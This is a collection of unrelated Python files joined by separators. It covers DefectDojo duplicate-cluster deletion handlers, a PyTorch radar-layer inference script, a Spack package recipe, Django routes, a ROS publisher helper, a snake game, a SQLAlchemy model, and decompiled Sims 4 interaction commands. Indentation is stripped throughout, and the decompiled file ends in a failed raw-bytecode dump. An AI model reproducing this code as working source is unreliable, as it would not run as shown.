# this shouldn't be necessary as Django should remove any Many-To-Many entries automatically, might be a bug in Django?
# https://code.djangoproject.com/ticket/154
logger.debug('finding delete: clearing found by')
instance.found_by.clear()
instance.status_finding.clear()
@receiver(post_delete, sender=Finding)
def finding_post_delete(sender, instance, **kwargs):
logger.debug('finding post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
# calculate_grade(instance.test.engagement.product)
def reset_duplicate_before_delete(dupe):
dupe.duplicate_finding = None
dupe.duplicate = False
def reset_duplicates_before_delete(qs):
mass_model_updater(Finding, qs, lambda f: reset_duplicate_before_delete(f), fields=['duplicate', 'duplicate_finding'])
def set_new_original(finding, new_original):
if finding.duplicate:
finding.duplicate_finding = new_original
# can't use model to id here due to the queryset
# @dojo_async_task
# @app.task
def reconfigure_duplicate_cluster(original, cluster_outside):
# when a finding is deleted, and is an original of a duplicate cluster, we have to chose a new original for the cluster
# only look for a new original if there is one outside this test
if original is None or cluster_outside is None or len(cluster_outside) == 0:
return
if settings.DUPLICATE_CLUSTER_CASCADE_DELETE:
cluster_outside.order_by('-id').delete()
else:
logger.debug('reconfigure_duplicate_cluster: cluster_outside: %s', cluster_outside)
# set new original to first finding in cluster (ordered by id)
new_original = cluster_outside.order_by('id').first()
if new_original:
logger.debug('changing original of duplicate cluster %d to: %s:%s', original.id, new_original.id, new_original.title)
new_original.duplicate = False
new_original.duplicate_finding = None
new_original.active = True
new_original.save_no_options()
new_original.found_by.set(original.found_by.all())
# if the cluster is size 1, there's only the new original left
if new_original and len(cluster_outside) > 1:
# for find in cluster_outside:
# if find != new_original:
# find.duplicate_finding = new_original
# find.save_no_options()
mass_model_updater(Finding, cluster_outside, lambda f: set_new_original(f, new_original), fields=['duplicate_finding'])
def prepare_duplicates_for_delete(test=None, engagement=None):
logger.debug('prepare duplicates for delete, test: %s, engagement: %s', test.id if test else None, engagement.id if engagement else None)
if test is None and engagement is None:
logger.warn('nothing to prepare as test and engagement are None')
fix_loop_duplicates()
# get all originals in the test/engagement
originals = Finding.objects.filter(original_finding__isnull=False)
if engagement:
originals = originals.filter(test__engagement=engagement)
if test:
originals = originals.filter(test=test)
# use distinct to flatten the join result
originals = originals.distinct()
if len(originals) == 0:
logger.debug('no originals found, so no duplicates to prepare for deletion of original')
return
# remove the link to the original from the duplicates inside the cluster so they can be safely deleted by the django framework
total = len(originals)
i = 0
# logger.debug('originals: %s', [original.id for original in originals])
for original in originals:
i += 1
logger.debug('%d/%d: preparing duplicate cluster for deletion of original: %d', i, total, original.id)
cluster_inside = original.original_finding.all()
if engagement:
cluster_inside = cluster_inside.filter(test__engagement=engagement)
if test:
cluster_inside = cluster_inside.filter(test=test)
if len(cluster_inside) > 0:
reset_duplicates_before_delete(cluster_inside)
# reconfigure duplicates outside test/engagement
cluster_outside = original.original_finding.all()
if engagement:
cluster_outside = cluster_outside.exclude(test__engagement=engagement)
if test:
cluster_outside = cluster_outside.exclude(test=test)
if len(cluster_outside) > 0:
reconfigure_duplicate_cluster(original, cluster_outside)
logger.debug('done preparing duplicate cluster for deletion of original: %d', original.id)
@receiver(pre_delete, sender=Test)
def test_pre_delete(sender, instance, **kwargs):
logger.debug('test pre_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
prepare_duplicates_for_delete(test=instance)
@receiver(post_delete, sender=Test)
def test_post_delete(sender, instance, **kwargs):
logger.debug('test post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
@receiver(pre_delete, sender=Engagement)
def engagement_pre_delete(sender, instance, **kwargs):
logger.debug('engagement pre_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
prepare_duplicates_for_delete(engagement=instance)
@receiver(post_delete, sender=Engagement)
def engagement_post_delete(sender, instance, **kwargs):
logger.debug('engagement post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
def fix_loop_duplicates():
""" Due to bugs in the past and even currently when under high parallel load, there can be transitive duplicates. """
""" i.e. A -> B -> C. This can lead to problems when deleting findingns, performing deduplication, etc """
candidates = Finding.objects.filter(duplicate_finding__isnull=False, original_finding__isnull=False).order_by("-id")
loop_count = len(candidates)
if loop_count > 0:
deduplicationLogger.info("Identified %d Findings with Loops" % len(candidates))
for find_id in candidates.values_list('id', flat=True):
removeLoop(find_id, 50)
new_originals = Finding.objects.filter(duplicate_finding__isnull=True, duplicate=True)
for f in new_originals:
deduplicationLogger.info("New Original: %d " % f.id)
f.duplicate = False
super(Finding, f).save()
loop_count = Finding.objects.filter(duplicate_finding__isnull=False, original_finding__isnull=False).count()
deduplicationLogger.info("%d Finding found which still has Loops, please run fix loop duplicates again" % loop_count)
return loop_count
def removeLoop(finding_id, counter):
# get latest status
finding = Finding.objects.get(id=finding_id)
real_original = finding.duplicate_finding
if not real_original or real_original is None:
# loop fully removed
return
# duplicate of itself -> clear duplicate status
if finding_id == real_original.id:
# loop fully removed
finding.duplicate_finding = None
# duplicate remains True, will be set to False in fix_loop_duplicates (and logged as New Original?).
super(Finding, finding).save()
return
# Only modify the findings if the original ID is lower to get the oldest finding as original
if (real_original.id > finding_id) and (real_original.duplicate_finding is not None):
# If not, swap them around
tmp = finding_id
finding_id = real_original.id
real_original = Finding.objects.get(id=tmp)
finding = Finding.objects.get(id=finding_id)
if real_original in finding.original_finding.all():
# remove the original from the duplicate list if it is there
finding.original_finding.remove(real_original)
super(Finding, finding).save()
if counter <= 0:
# Maximum recursion depth as safety method to circumvent recursion here
return
for f in finding.original_finding.all():
# for all duplicates set the original as their original, get rid of self in between
f.duplicate_finding = real_original
super(Finding, f).save()
super(Finding, real_original).save()
removeLoop(f.id, counter - 1)
|
from __future__ import print_function
import os
import os.path as osp
import sys
import time
import argparse
import torch
import torch.nn as nn
import torch.utils.data as data
import numpy as np
import numpy.linalg as LA
from scipy.io import loadmat
from rnn import *
from cnn import *
import config as cfg
def default_loader(path, number):
c3d_data = []
for index in range(number-2, number+3):
index = min(max(index, 1), 3332)
mat = loadmat(osp.join(path, str(index).zfill(5)+'.mat'))
c3d_data.append(mat['fusion'].astype(np.float32))
c3d_data = np.array(c3d_data, dtype=np.float32)
c3d_data = (c3d_data-0.5)/0.5
c3d_data = c3d_data[np.newaxis, ...]
rnn_data = c3d_data[0,2,:].copy()
norm = LA.norm(rnn_data, axis=0)
rnn_data /= norm[None, :]
return c3d_data, rnn_data
class DataLayer(data.Dataset):
def __init__(self, data_root, sessions, loader=default_loader):
self.data_root = data_root
self.sessions = sessions
self.loader = loader
self.inputs = []
for session_name in self.sessions:
session_path = osp.join(self.data_root, 'target', session_name+'.txt')
session_data = open(session_path, 'r').read().splitlines()
self.inputs.extend(session_data)
def __getitem__(self, index):
data_path, number, air_target, bed_target = self.inputs[index].split()
c3d_data, rnn_data = self.loader(osp.join(
self.data_root, 'slices_mat_64x64', data_path), int(number))
c3d_data, rnn_data = torch.from_numpy(c3d_data), torch.from_numpy(rnn_data)
air_target = np.array(air_target.split(','), dtype=np.float32)
air_target = torch.from_numpy(air_target)
bed_target = np.array(bed_target.split(','), dtype=np.float32)
bed_target = torch.from_numpy(bed_target)
return c3d_data, rnn_data, air_target, bed_target, data_path
def __len__(self):
return len(self.inputs)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
parser.add_argument('--batch_size', default=1, type=int)
parser.add_argument('--num_workers', default=0, type=int)
parser.add_argument('--c3d_pth', default='pretrained_models/c3d.pth', type=str)
parser.add_argument('--rnn_pth', default='pretrained_models/rnn.pth', type=str)
# Victor: add command-line arguments for frames to be run
parser.add_argument('--frms', nargs='+')
# Victor: add output directory for results file
parser.add_argument('--output_dir', default='NN_TempOutput.txt', type=str);
args = cfg.parse_args(parser)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Victor: open results file to write output to
file = open(args.output_dir, "w");
data_set = DataLayer(
data_root=args.data_root,
#sessions=args.test_session_set,
sessions = args.frms,
)
data_loader = data.DataLoader(
data_set,
batch_size=args.batch_size,
num_workers=args.num_workers,
)
c3d_model = C3D().to(device)
c3d_model.load_state_dict(torch.load(args.c3d_pth))
c3d_model.train(False)
rnn_model = RNN().to(device)
rnn_model.load_state_dict(torch.load(args.rnn_pth))
rnn_model.train(False)
air_criterion = nn.L1Loss().to(device)
bed_criterion = nn.L1Loss().to(device)
air_errors = 0.0
bed_errors = 0.0
frm_init = True;
frm_name = '';
start = time.time()
with torch.set_grad_enabled(False):
for batch_idx, (c3d_data, rnn_data, air_target, bed_target, data_path) in enumerate(data_loader):
c3d_data = c3d_data.to(device)
rnn_data = rnn_data.to(device)
air_target = air_target.to(device)
bed_target = bed_target.to(device)
air_feature, bed_feature = c3d_model.features(c3d_data)
init = torch.cat((air_feature, bed_feature), 1)
air_output, bed_output = rnn_model(rnn_data, init)
# Save these air and bed layer for visualization
air_layer = (air_output.to('cpu').numpy()+1)*412
bed_layer = (bed_output.to('cpu').numpy()+1)*412
# Victor: define frame name
data_path_mod = data_path[0].replace("/", "_");
# Victor: write results for surface and bottom layers to text file
file.write(data_path_mod + '\n');
for idx in range(0, air_layer.shape[1]):
file.write(str(air_layer[0, idx]) + ' ')
file.write('\n');
for idx in range(0, bed_layer.shape[1]):
file.write(str(bed_layer[0, idx]) + ' ')
file.write('\n\n\n');
air_loss = air_criterion(air_output, air_target)
bed_loss = bed_criterion(bed_output, bed_target)
air_errors += air_loss.item()
bed_errors += bed_loss.item()
end = time.time()
# Victor: close file reader
file.close();
print('Finish all, errors (air): {:4.2f} (bed): {:4.2f}, '
'total running time: {:.2f} sec'.format(
air_errors/len(data_loader.dataset)*412,
bed_errors/len(data_loader.dataset)*412,
end-start,
))
if __name__ == '__main__':
main()
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RSpem(RPackage):
"""S-system parameter estimation method.
This package can optimize the parameter in S-system models given time
series data"""
homepage = "https://bioconductor.org/packages/SPEM"
git = "https://git.bioconductor.org/packages/SPEM.git"
version('1.24.0', commit='537ed19e466008f2972a246479b327c95177a99e')
version('1.22.0', commit='fddb7cd1f81e47eae603724ea149c2adca5b3eb4')
version('1.20.0', commit='b0e1049c61a35da00882d21026f4c1eb03b17517')
version('1.18.0', commit='3ab425dd9889885eac328d26b73366a875cd250b')
version('1.16.0', commit='9c0a96374086765db9c81e36a662999067fa4cc7')
depends_on('r@2.15.1:', type=('build', 'run'))
depends_on('r-rsolnp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
|
from django.urls import path
from .views import *
urlpatterns = [
path('',indexshow,name='indexshow'),
path('contact/',contact,name='contact'),
path('team/',team,name='team'),
path('about/',about,name='about'),
]
|
"""Class used to group a number of publishers together.
"""
import rospy
class GroupPublisher(list):
"""Used for bundling ROS publishers together and publishing
to these publishers at the same time.
"""
def __init__(self, iterable=[]):
"""Initiate group publisher object.
Args:
iterable (list, optional): New list initialized from iterable items.
Defaults to ``[]``.
Raises:
ValueError: If list does not only contain ROS publishers.
"""
# Validate if list contains publisher objects
if type(iterable) is list:
for publisher in iterable:
if type(publisher) is not rospy.Publisher:
raise ValueError(
"Please supply a list containing only ros publishers."
)
else:
if type(iterable) is not rospy.Publisher:
raise ValueError("Please supply a list containing only ros publishers.")
super(GroupPublisher, self).__init__(iterable)
def publish(self, messages):
"""Publishes a list of messages to the publishers contained on the
GroupPublisher object. The index of the message corresponds to the
publisher the message will be published to.
Args:
messages (list): List containing the messages to be published.
Raises:
ValueError: If something went wrong during publishing.
"""
# Validate input messages
if self.__len__() == 0:
raise ValueError(
"Message could not be published since GroupPublisher "
"contains no publishers."
)
elif self.__len__() > 1 and type(messages) is not list:
raise ValueError(
"Only one message was given while the GroupPublisher object "
"contains %s publishers. Please input a list containing %s ROS "
"messages." % (self.__len__(), self.__len__())
)
elif self.__len__() > 1 and type(messages) is list:
if self.__len__() != len(messages):
raise ValueError(
"%s messages were given while the GroupPublisher object "
"contains %s publishers. Please input a list containing %s ROS "
"messages." % (len(messages), self.__len__(), self.__len__())
)
# Publish messages to the publishers
if type(messages) is not list:
self[0].publish(messages)
else:
for ii in range(len(messages)):
self[ii].publish(messages[ii])
|
import copy
class Snake:
def __init__(self, position, direction, length=5, speed=1):
self.length = length
self.speed = speed
self.direction = direction
self.speed_x = 0
self.speed_y = 0
self.set_speeds(direction)
self.position = position
self.delay_counter = 0
self.body = Body(length, self.position[0], self.position[1], self.speed_x, self.speed_y)
self.alive = True
self.apple = None
self.time_since_last_apple = 0
self.score = 0.0
def set_direction(self, direction):
pass
def set_apple(self, apple):
self.apple = apple
def check_is_a_valid_direction(self, direction):
segments = self.body.get_segments()
first = segments[0]
second = segments[1]
if first.position_x == second.position_x and first.position_y > second.position_y:
if direction is "up":
return False
if first.position_x == second.position_x and first.position_y < second.position_y:
if direction is "down":
return False
if first.position_y == second.position_y and first.position_x > second.position_x:
if direction is "left":
return False
if first.position_y == second.position_y and first.position_x < second.position_x:
if direction is "right":
return False
return True
def set_speeds(self, direction):
if direction == "left":
self.speed_x = -1
self.speed_y = 0
elif direction == "right":
self.speed_x = 1
self.speed_y = 0
elif direction == "up":
self.speed_x = 0
self.speed_y = -1
elif direction == "down":
self.speed_x = 0
self.speed_y = 1
def update_position(self):
if self.delay_counter == 100 - self.speed:
self.time_since_last_apple += 1
segments = self.body.get_segments()
last_segment = segments.pop(-1)
last_segment.position_x = segments[0].position_x + self.speed_x
last_segment.position_y = segments[0].position_y + self.speed_y
segments.insert(0, last_segment)
self.delay_counter = 0
self.update_score()
else:
self.delay_counter += 1
def get_segments(self):
return self.body.get_segments()
def add_a_segment(self):
self.time_since_last_apple = 0
self.length += 1
self.body.add_a_segment()
self.score += 10
def update_score(self):
segments = self.body.get_segments()
new_head = segments[0]
previous_head = segments[1]
if abs(self.apple.position_x - new_head.position_x) < abs(self.apple.position_x - previous_head.position_x):
self.score += 1
elif abs(self.apple.position_x - new_head.position_x) > abs(self.apple.position_x - previous_head.position_x):
self.score -= 0.5
if abs(self.apple.position_y - new_head.position_y) < abs(self.apple.position_y - previous_head.position_y):
self.score += 1
elif abs(self.apple.position_y - new_head.position_y) > abs(self.apple.position_y - previous_head.position_y):
self.score -= 0.5
class Segment:
def __init__(self, position_x, position_y):
self.position_x = position_x
self.position_y = position_y
class Body:
def __init__(self, length, head_x, head_y, speed_x, speed_y):
self.length = length
self.speed_y = speed_y
self.speed_x = speed_x
self.head_x = head_x
self.head_y = head_y
self.list_of_segments = self.generate_segments()
def generate_segments(self):
list_of_segments = []
for i in range(self.length):
pos_x = self.head_x - i * self.speed_x
pos_y = self.head_y - i * self.speed_y
list_of_segments.append(Segment(pos_x, pos_y))
return list_of_segments
def get_segments(self):
return self.list_of_segments
def add_a_segment(self):
last_segment = self.list_of_segments[-1]
copied_segment = copy.deepcopy(last_segment)
self.list_of_segments.append(copied_segment)
|
from datetime import datetime
from sqlalchemy import (
Column,
ForeignKey,
Integer,
DateTime
)
from sqlalchemy.orm import relationship
from frost.server.database import Base
class Match(Base):
__tablename__ = 'matches'
id = Column(Integer, primary_key=True, nullable=False)
place = Column(Integer, nullable=False)
score = Column(Integer, nullable=False)
timestamp = Column(DateTime, default=datetime.utcnow)
user_id = Column(Integer, ForeignKey('users.id'), nullable=False)
user = relationship('User')
def __repr__(self) -> str:
return (
f'<{type(self).__name__} id={self.id!r} user_id={self.user_id!r} '
f'score={self.score!r} place={self.place!r}>'
)
|
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\server_commands\interaction_commands.py
# Compiled at: 2020-08-28 23:32:04
# Size of source mod 2**32: 73695 bytes
from protocolbuffers import InteractionOps_pb2 as interaction_protocol, Sims_pb2 as protocols, Consts_pb2
from protocolbuffers.DistributorOps_pb2 import Operation
from clubs import club_tuning
from clubs.club_enums import ClubRuleEncouragementStatus
from distributor.ops import GenericProtocolBufferOp
from distributor.rollback import ProtocolBufferRollback
from distributor.shared_messages import create_icon_info_msg, IconInfoData
from distributor.system import Distributor
from event_testing.resolver import SingleSimResolver, SingleActorAndObjectResolver, InteractionResolver
from gsi_handlers import posture_graph_handlers
from interactions.choices import ChoiceMenu, toggle_show_interaction_failure_reason
from interactions.context import InteractionContext
from interactions.priority import Priority
from interactions.utils.enum_utils import FlagField
from objects import ALL_HIDDEN_REASONS
from objects.pools import pool_utils
from postures import posture_graph
from server.config_service import ContentModes
from server.pick_info import PickInfo, PickType, PICK_USE_TERRAIN_OBJECT, PICK_NEVER_USE_POOL
from server_commands.argument_helpers import get_optional_target, OptionalTargetParam, RequiredTargetParam, TunableInstanceParam
from sims.phone_tuning import PhoneTuning
from sims4.commands import Output
from sims4.localization import TunableLocalizedStringFactory, create_tokens
from sims4.tuning.tunable import TunableResourceKey
from terrain import get_water_depth
from world.ocean_tuning import OceanTuning
import gsi_handlers.sim_handlers_log, autonomy.content_sets, build_buy, enum, interactions.social.social_mixer_interaction, interactions.utils.outcome, objects.terrain, postures.transition_sequence, routing, services, sims4.commands, sims4.log, sims4.reload, telemetry_helper
logger = sims4.log.Logger('Interactions')
TELEMETRY_GROUP_PIE_MENU = 'PIEM'
TELEMETRY_HOOK_CREATE_PIE_MENU = 'PIEM'
writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_PIE_MENU)
with sims4.reload.protected(globals()):
_show_interaction_tuning_name = False
_show_front_page_score = False
class InteractionCommandsTuning:
INTERACTION_TUNING_NAME = TunableLocalizedStringFactory(description='\n The localized string used to create interaction choice names and\n display the tuning name next to it.\n ')
INTERACTION_FRONT_PAGE_SCORING = TunableLocalizedStringFactory(description='\n The localized string used to create interaction choice names and\n front page scoring.\n ')
def _active_sim(client):
if client:
return client.active_sim
@sims4.commands.Command('interactions.posture_graph_build', 'posture_graph.build')
def build_posture_graph(_connection=None):
services.current_zone().posture_graph_service.rebuild()
@sims4.commands.Command('interactions.posture_graph_export', 'posture_graph.export')
def export_posture_graph(_connection=None):
services.current_zone().posture_graph_service.export()
@sims4.commands.Command('interactions.posture_graph_gsi_min_progress', 'posture_graph.gsi_min_progress')
def posture_graph_min_gsi_progress(min_progress: int=0, _connection=None):
posture_graph_handlers.gsi_min_progress = min_progress
@sims4.commands.Command('interactions.show_interaction_tuning_name', command_type=(sims4.commands.CommandType.DebugOnly))
def show_interaction_tuning_name(enable: bool=None, _connection=None):
global _show_interaction_tuning_name
if enable is None:
enable = not _show_interaction_tuning_name
_show_interaction_tuning_name = enable
@sims4.commands.Command('interactions.show_front_page_score', command_type=(sims4.commands.CommandType.DebugOnly))
def show_front_page_score(enable: bool=None, _connection=None):
global _show_front_page_score
if enable is None:
enable = not _show_front_page_score
_show_front_page_score = enable
sims4.commands.output('show_front_page_score: {}.'.format(_show_front_page_score), _connection)
@sims4.commands.Command('interactions.show_failure_reason')
def show_interaction_failure_reason(enable: bool=None, _connection=None):
toggle_show_interaction_failure_reason(enable=enable)
@sims4.commands.Command('interactions.has_choices', command_type=(sims4.commands.CommandType.Live))
def has_choices(target_id: int=None, pick_type: PickType=PickType.PICK_TERRAIN, x: float=0.0, y: float=0.0, z: float=0.0, lot_id: int=0, level: int=0, control: int=0, alt: int=0, shift: int=0, reference_id: int=0, is_routable: bool=True, _connection=None):
if target_id is None:
return
zone = services.current_zone()
client = services.client_manager().get(_connection)
if client is None:
return
sim = _active_sim(client)
shift_held = bool(shift)
if shift_held:
cheat_service = services.get_cheat_service()
if False or cheat_service.cheats_enabled:
_send_interactable_message(client, target_id, True, interactable_flags=(interaction_protocol.Interactable.INTERACTABLE))
else:
_send_interactable_message(client, target_id, False)
else:
return
situation_manager = services.get_zone_situation_manager()
for situation in situation_manager.get_all():
if situation.disabled_interaction_tooltip is not None and situation.is_sim_in_situation(sim):
return
position = sims4.math.Vector3(x, y, z)
pick_target = zone.find_object(target_id)
pick_target, pick_type, potential_targets = _get_targets_from_pick(sim, pick_target, pick_type, position, level, (zone.id), lot_id,
is_routable, preferred_objects=(set()))
is_interactable = False
if pick_target is not None:
tutorial_service = services.get_tutorial_service()
alt_bool = bool(alt)
control_bool = bool(control)
for potential_target, routing_surface in potential_targets:
pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
lot_id=lot_id,
level=level,
alt=alt_bool,
control=control_bool,
shift=shift_held)
context = client.create_interaction_context(sim, pick=pick)
for aop in potential_target.potential_interactions(context):
if tutorial_service is not None:
if not tutorial_service.is_affordance_visible(aop.affordance):
continue
else:
result = ChoiceMenu.is_valid_aop(aop, context, user_pick_target=potential_target)
if not result:
if not result.tooltip:
continue
is_interactable = aop.affordance.allow_user_directed
is_interactable = is_interactable or (aop.affordance.has_pie_menu_sub_interactions)(
(aop.target), context, **aop.interaction_parameters)
if is_interactable:
break
if sim is not None:
for si in sim.si_state:
potential_mixer_targets = si.get_potential_mixer_targets()
for potential_mixer_target in potential_mixer_targets:
if potential_target is potential_mixer_target:
break
if potential_mixer_target.is_part and potential_mixer_target.part_owner is potential_target:
break
else:
continue
if autonomy.content_sets.any_content_set_available(sim, (si.super_affordance),
si, context, potential_targets=(potential_target,), include_failed_aops_with_tooltip=True):
is_interactable = True
break
else:
continue
fire_service = is_interactable or services.get_fire_service()
if fire_service.fire_is_active:
fires = fire_service.get_fires_in_potential_targets(potential_targets)
if fires:
potential_target = fires[0]
pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
lot_id=lot_id,
level=level,
alt=alt_bool,
control=control_bool,
shift=shift_held)
context = client.create_interaction_context(sim, pick=pick)
for aop in potential_target.potential_interactions(context):
if not aop.affordance.allow_user_directed:
continue
result = ChoiceMenu.is_valid_aop(aop, context, user_pick_target=potential_target)
if result:
is_interactable = True
break
interactable_flags = _get_interactable_flags(pick_target, is_interactable)
_send_interactable_message(client, target_id, is_interactable, True, interactable_flags=interactable_flags)
def _send_interactable_message(client, target_id, is_interactable, immediate=False, interactable_flags=0):
msg = interaction_protocol.Interactable()
msg.object_id = target_id
msg.is_interactable = is_interactable
msg.interactable_flags = interactable_flags
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_OBJECT_IS_INTERACTABLE, msg, immediate)
def _get_interactable_flags(target, is_interactable):
if target is None:
return 0
elif is_interactable:
interactable_flag_field = FlagField(interaction_protocol.Interactable.INTERACTABLE)
else:
interactable_flag_field = FlagField()
target.modify_interactable_flags(interactable_flag_field)
return interactable_flag_field.flags
class PieMenuActions(enum.Int, export=False):
SHOW_PIE_MENU = 0
SHOW_DEBUG_PIE_MENU = 1
INTERACTION_QUEUE_FULL_TOOLTIP = 2
INTERACTION_QUEUE_FULL_STR = TunableLocalizedStringFactory(description="\n Tooltip string shown to the user instead of a pie menu when the Sim's queue\n is full of interactions.\n ")
POSTURE_INCOMPATIBLE_ICON = TunableResourceKey(description='\n Icon to be displayed when pie menu option is not compatible with\n current posture of the sim.\n ',
resource_types=(sims4.resources.CompoundTypes.IMAGE))
def should_generate_pie_menu(client, sim, shift_held):
can_queue_interactions = sim is None or sim.queue is None or sim.queue.can_queue_visible_interaction()
if shift_held:
cheat_service = services.get_cheat_service()
if False or cheat_service.cheats_enabled:
return PieMenuActions.SHOW_DEBUG_PIE_MENU
if can_queue_interactions:
return PieMenuActions.SHOW_PIE_MENU
return PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
else:
if can_queue_interactions:
return PieMenuActions.SHOW_PIE_MENU
return PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
def _get_targets_from_pick--- This code section failed: ---
L. 362 0 BUILD_LIST_0 0
2 STORE_FAST 'potential_targets'
L. 363 4 LOAD_CONST 0
6 STORE_FAST 'pool_block_id'
L. 364 8 LOAD_FAST 'sim'
10 LOAD_CONST None
12 COMPARE_OP is-not
14 POP_JUMP_IF_FALSE 76 'to 76'
16 LOAD_FAST 'pick_type'
18 LOAD_GLOBAL PICK_NEVER_USE_POOL
20 COMPARE_OP not-in
22 POP_JUMP_IF_FALSE 76 'to 76'
24 LOAD_GLOBAL build_buy
26 LOAD_METHOD is_location_pool
28 LOAD_FAST 'position'
30 LOAD_FAST 'level'
32 CALL_METHOD_2 2 '2 positional arguments'
34 POP_JUMP_IF_FALSE 76 'to 76'
L. 368 36 LOAD_GLOBAL routing
38 LOAD_METHOD SurfaceIdentifier
40 LOAD_FAST 'zone_id'
42 LOAD_FAST 'level'
44 LOAD_GLOBAL routing
46 LOAD_ATTR SurfaceType
48 LOAD_ATTR SURFACETYPE_POOL
50 CALL_METHOD_3 3 '3 positional arguments'
52 STORE_FAST 'routing_surface'
L. 369 54 LOAD_GLOBAL build_buy
56 LOAD_METHOD get_block_id
58 LOAD_FAST 'sim'
60 LOAD_ATTR zone_id
62 LOAD_FAST 'position'
64 LOAD_FAST 'level'
66 LOAD_CONST 1
68 BINARY_SUBTRACT
70 CALL_METHOD_3 3 '3 positional arguments'
72 STORE_FAST 'pool_block_id'
74 JUMP_FORWARD 94 'to 94'
76_0 COME_FROM 34 '34'
76_1 COME_FROM 22 '22'
76_2 COME_FROM 14 '14'
L. 371 76 LOAD_GLOBAL routing
78 LOAD_METHOD SurfaceIdentifier
80 LOAD_FAST 'zone_id'
82 LOAD_FAST 'level'
84 LOAD_GLOBAL routing
86 LOAD_ATTR SurfaceType
88 LOAD_ATTR SURFACETYPE_WORLD
90 CALL_METHOD_3 3 '3 positional arguments'
92 STORE_FAST 'routing_surface'
94_0 COME_FROM 74 '74'
L. 373 94 LOAD_FAST 'pick_type'
96 LOAD_GLOBAL PICK_USE_TERRAIN_OBJECT
98 COMPARE_OP in
100_102 POP_JUMP_IF_FALSE 480 'to 480'
L. 374 104 LOAD_GLOBAL sims4
106 LOAD_ATTR math
108 LOAD_METHOD Location
110 LOAD_GLOBAL sims4
112 LOAD_ATTR math
114 LOAD_METHOD Transform
116 LOAD_FAST 'position'
118 CALL_METHOD_1 1 '1 positional argument'
120 LOAD_FAST 'routing_surface'
122 CALL_METHOD_2 2 '2 positional arguments'
124 STORE_FAST 'location'
L. 375 126 LOAD_GLOBAL objects
128 LOAD_ATTR terrain
130 LOAD_METHOD TerrainPoint
132 LOAD_FAST 'location'
134 CALL_METHOD_1 1 '1 positional argument'
136 STORE_FAST 'terrain_point'
L. 376 138 LOAD_FAST 'terrain_point'
140 STORE_FAST 'pick_target'
L. 377 142 LOAD_GLOBAL get_water_depth
144 LOAD_FAST 'position'
146 LOAD_ATTR x
148 LOAD_FAST 'position'
150 LOAD_ATTR z
152 LOAD_FAST 'level'
154 CALL_FUNCTION_3 3 '3 positional arguments'
156 STORE_FAST 'water_height'
L. 378 158 LOAD_FAST 'lot_id'
160 POP_JUMP_IF_FALSE 198 'to 198'
162 LOAD_FAST 'lot_id'
164 LOAD_GLOBAL services
166 LOAD_METHOD active_lot_id
168 CALL_METHOD_0 0 '0 positional arguments'
170 COMPARE_OP !=
172 POP_JUMP_IF_FALSE 198 'to 198'
L. 381 174 LOAD_GLOBAL PickType
176 LOAD_ATTR PICK_TERRAIN
178 STORE_FAST 'pick_type'
L. 382 180 LOAD_FAST 'potential_targets'
182 LOAD_METHOD append
184 LOAD_FAST 'pick_target'
186 LOAD_FAST 'routing_surface'
188 BUILD_TUPLE_2 2
190 CALL_METHOD_1 1 '1 positional argument'
192 POP_TOP
194_196 JUMP_ABSOLUTE 882 'to 882'
198_0 COME_FROM 172 '172'
198_1 COME_FROM 160 '160'
L. 383 198 LOAD_FAST 'pool_block_id'
200 POP_JUMP_IF_FALSE 254 'to 254'
L. 385 202 LOAD_GLOBAL pool_utils
204 LOAD_METHOD get_pool_by_block_id
206 LOAD_FAST 'pool_block_id'
208 CALL_METHOD_1 1 '1 positional argument'
210 STORE_FAST 'pool'
L. 386 212 LOAD_FAST 'pool'
214 LOAD_CONST None
216 COMPARE_OP is-not
218 POP_JUMP_IF_FALSE 252 'to 252'
L. 387 220 LOAD_GLOBAL objects
222 LOAD_ATTR terrain
224 LOAD_METHOD PoolPoint
226 LOAD_FAST 'location'
228 LOAD_FAST 'pool'
230 CALL_METHOD_2 2 '2 positional arguments'
232 STORE_FAST 'pool_point'
L. 388 234 LOAD_FAST 'pool_point'
236 STORE_FAST 'pick_target'
L. 389 238 LOAD_FAST 'potential_targets'
240 LOAD_METHOD append
242 LOAD_FAST 'pool_point'
244 LOAD_FAST 'routing_surface'
246 BUILD_TUPLE_2 2
248 CALL_METHOD_1 1 '1 positional argument'
250 POP_TOP
252_0 COME_FROM 218 '218'
252 JUMP_FORWARD 882 'to 882'
254_0 COME_FROM 200 '200'
L. 390 254 LOAD_FAST 'water_height'
256 LOAD_CONST 0
258 COMPARE_OP >
260_262 POP_JUMP_IF_FALSE 462 'to 462'
264 LOAD_FAST 'sim'
266 LOAD_CONST None
268 COMPARE_OP is-not
270_272 POP_JUMP_IF_FALSE 462 'to 462'
L. 391 274 LOAD_GLOBAL services
276 LOAD_ATTR terrain_service
278 LOAD_METHOD ocean_object
280 CALL_METHOD_0 0 '0 positional arguments'
282 LOAD_CONST None
284 COMPARE_OP is-not
286_288 POP_JUMP_IF_FALSE 410 'to 410'
L. 392 290 LOAD_FAST 'is_routable'
292_294 POP_JUMP_IF_TRUE 300 'to 300'
L. 395 296 LOAD_CONST (None, None, ())
298 RETURN_VALUE
300_0 COME_FROM 292 '292'
L. 396 300 LOAD_GLOBAL OceanTuning
302 LOAD_METHOD get_actor_wading_interval
304 LOAD_FAST 'sim'
